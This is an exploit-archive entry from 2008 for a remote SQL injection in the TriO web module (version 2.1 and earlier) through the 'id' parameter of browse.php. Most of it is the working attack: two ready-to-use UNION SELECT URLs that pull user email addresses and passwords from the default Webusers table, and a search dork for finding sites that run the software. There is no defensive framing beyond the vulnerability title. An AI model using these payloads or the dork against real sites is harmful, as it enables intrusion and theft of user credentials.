TriO <= 2.1 (browse.php id) Remote SQL Injection Vulnerability

2008-07-26T00:00:00
ID 1337DAY-ID-3456
Type zdt
Reporter dun
Modified 2008-07-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
TriO <= 2.1 (browse.php id) Remote SQL Injection Vulnerability
==============================================================


 ##############################################################
 #   [ TriO <= 2.1 ]   Remote SQL Injection Vulnerability     #
 ##############################################################
 # 
 # [ Script: "TriO, iO's new web-based module, enables you to quickly, easily, and securely make your collections..." ]
 #
 # [ Script site: http://www.willo.com/io/trio.asp ]
 # 
 # [ Default table_name with users: Webusers ]
 # 
 # [ Vuln: browse.php ]  
 # http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
 # http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--	
 #	
 # 
 # [ Dork example: "This website is powered by Trio" ]
 #
 #####################################################



#  0day.today [2018-03-06]  #